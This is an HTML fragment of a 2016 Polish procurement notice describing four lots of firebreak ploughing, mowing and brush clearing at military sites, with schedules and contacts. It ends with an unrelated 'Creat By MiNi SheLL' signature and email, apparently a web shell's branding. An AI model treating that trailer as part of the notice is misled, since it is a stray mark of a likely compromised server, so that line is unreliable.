<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mineralizacja pasów przeciwpożarowych na strzelnicy garnizonowej OC Zielona oraz ochrona przeciwpożarowa terenów przyległych do wału strzelnicy garnizonowej OC Zielona.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I - rejon Sowlany Karakule - OC Zielona
Mineralizacja pasów przeciwpożarowych na strzelnicy garnizonowej OC Zielona oraz ochrona przeciwpożarowa terenów przyległych do wału strzelnicy garnizonowej OC Zielona
1.Każdorazowe wejście na teren kompleksu wojskowego Wykonawca ma obowiązek uzgodnić z Kierownikiem Grupy Zabezpieczenia Białystok.
2.Mineralizacja istniejących pasów przeciwpożarowych o szerokości 3 m i szacunkowej długości  7,500 m (powierzchnia 2,250 ha) poprzez:
a.orkę ciągnikiem z pługiem przyczepnym na głębokości 25-30 cm i przebronowanie broną talerzową, a w miejscach niedostępnych pas należy przeorać glebogryzarką ręczną,
b.przeorany pas należy oczyścić z chwastów, samosiej i zalegających gałęzi, które Wykonawca wywozi na własny koszt
3.Wycinka samosiejek i wykoszenie trawy na terenie o łącznej powierzchni 3 ha w miejscach wskazanych przez Zamawiającego poprzez:
a.wykoszenie trawy, chwastów oraz wycięciu samosiejek na wskazanej powierzchni, przy czym wysokość trawy po skoszeniu nie powinna być wyższa niż 7 cm, a pozostałych pni po samosiejkach 10 cm,
b.wykoszone trawy i chwasty należy zebrać i wywieźć na koszt Wykonawcy a wycięte samosiejki złożyć w miejscu wskazanym przez Zamawiającego.
c.wycince podlegają samosiejki - krzewy w wieku do 10 lat oraz samosiejki o obwodzie na wysokości 5 cm od podstawy .
4.Częstotliwość wykonywania zabiegów:
a.mineralizacja pasów  ppoż. - dwa razy w roku: 
I termin - do 30.06.2016r.
II termin - od 01.10.2016r. do 31.10.2016r.
b.wycinka samosiejek i wykoszenie trawy - jeden raz w roku od 01.08.2016r. do 31.08.2016r.
5.Wykonanie oprysków środkiem chwastobójczym - jeden raz w roku od 01.08.2016r do 15.08.2016r.
4.Przewiduję się wizję lokalną w celu oszacowania stopnia trudności                          i warunków realizacji zadania, 
Część 1, na dzień, 19 maja 2016r., godz. 9:00, Marzena WILUK, tel. 261 39 81 11,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.25.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Mineralizacja pasów przeciwpożarowych - rejon Skład Osowiec..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mineralizacja pasów przeciwpożarowych - rejon Skład Osowiec.
1.Każdorazowe wejście na teren kompleksu wojskowego Wykonawca ma obowiązek uzgodnić z Kierownikiem Grupy Zabezpieczenia Łomża.
2.Rodzaj prac do wykonania:
a.Mineralizacja pasów ppoż. przy budynkach magazynowych oraz pasów obwodnicy (łączna powierzchnia pasów 13,600 ha) poprzez  wykonanie orki pługiem a w miejscach niedostępnych dla ciągnika rolniczego glebogryzarką ręczną, bronowanie przeoranych pasów wraz z oczyszczeniem mineralizowanego terenu, oraz oczyszczeniem ogrodzenia obwodnicy usytuowanego na pasach ppoż.  z wszelkiej wrastającej roślinności, chwastów i samosiejek. 
b.przy budynkach magazynowych o szerokości 2 m i łącznej powierzchni 0,68 ha;
c.wzdłuż ogrodzeń obwodnicy (pasy zewnętrzne i wewnętrzne) o szerokości 5 m, długości 15 240 m i łącznej powierzchni 7,62 ha
d.wzdłuż ogrodzenia zewnętrznego kompleksu od strony drogi krajowej nr 65 o szerokości 2 m i długości 2 200m (powierzchnia 0,11 ha), szerokości 3 m i długości 575 m (powierzchnia 0,17 ha)
e.pas ochronny usytuowany po obu stronach drogi wewnętrznej między ogrodzeniem o szerokości 7,00 m i długości 7200 m (powierzchnia 5,04 ha)
f.Zakres usługi obejmuje:
a.orkę ciągnikiem z pługiem przyczepnym na głębokości 25-30 cm i przebronowanie broną talerzową, a w miejscach niedostępnych pas należy przeorać glebogryzarką ręczną,
b.przeorany pas należy oczyścić z chwastów, samosiej i zalegających gałęzi, które Wykonawca wywozi na własny koszt,
c.usuwanie wszelkiej wrastającej roślinności, chwastów i samosiejek z całej powierzchni ogrodzeń usytuowanych na pasach przeciwpożarowych.
d.wykonanie oprysków wzdłuż ogrodzenia obwodnicy 
3.Częstotliwość wykonywania zabiegów:
I termin - do 30.06.2016r.
II termin - od 15.07.2016r. 30.07.2016r.
III termin - od 15.08.2016r. 30.08.2016r.
IV termin - od 15.09.2016r. 30.09.2016r.
Wizja lokalna na dzień, 18 maja 2016r., godz.   9:00, Tadeusz JAŃCZYŁŁO, tel. 261 38 61 03,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.25.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pielęgnacja wałów przeciwpożarowych (koszenie wałów przeciwpożarowych) - Skład Hajnówka..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III - rejon Skład Hajnówka
Pielęgnacja wałów przeciwpożarowych (koszenie wałów przeciwpożarowych) - Skład Hajnówka.
1.Każdorazowe wejście na teren kompleksu wojskowego Wykonawca ma obowiązek uzgodnić z Kierownikiem Grupy Zabezpieczenia Hajnówka.
2.Koszenie trawy na wałach przeciwpożarowych budynków magazynowych o łącznej powierzchni 6,875 ha.
3.Wały przeciwpożarowe zostaną wskazane Wykonawcy przed przystąpieniem do realizacji umowy.
4.Zakres usługi obejmuje:
a.koszenie wałów do granic pasów ppoż. poszczególnych budynków,
b.wygrabienie skoszonej trawy i wywiezienie jej na koszt Wykonawcy,
c.uprzątnięcie podjazdów i opasek wokół budynków po koszeniu.
5.Częstotliwość wykonywania zabiegów - trzy razy w roku:
I termin - do 30.06.2016r.
II termin - od 01.08.2016r. 20.08.2016r.
III termin - od 10.09.2016r. 30.09.2016r.
Wizja lokalna:  na dzień, 19 maja 2016r., godz. 13:00, Paweł PATEJUK, tel. 261 343 744,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.25.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mineralizacja pasów przeciwpożarowych - rejon Plewki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część IV - rejon Plewki
Pielęgnacja pasa przeciwpożarowego - Plewki
1.Każdorazowe wejście na teren kompleksu wojskowego Wykonawca ma obowiązek uzgodnić z Kierownikiem Grupy Zabezpieczenia Łomża.
2.Mineralizacja istniejącego pasa przeciwpożarowego wzdłuż ogrodzenia JW. 2031 o szerokości 2 m; długość 868 m (powierzchnia 0,174 ha) poprzez: 
a.orkę ciągnikiem z pługiem przyczepnym na głębokości 25-30 cm i przebronowanie broną talerzową, a w miejscach niedostępnych pas należy przeorać glebogryzarką ręczną,
b.przeorany pas należy oczyścić z chwastów, samosiej i zalegających gałęzi, które Wykonawca wywozi na własny koszt.
3.Częstotliwość wykonywania zabiegów - cztery razy w roku: 
I termin - do 30.06.2016r.
II termin - od 15.07.2016r. 30.07.2016r.
III termin - od 15.08.2016r. 30.08.2016r.
IV termin - od 15.09.2016r. 30.09.2016r.
Wizja lokalna:na dzień 18 maja 2016r., godz. 13:00, Józef KRASUCKI, tel. 261 343 744.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.25.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com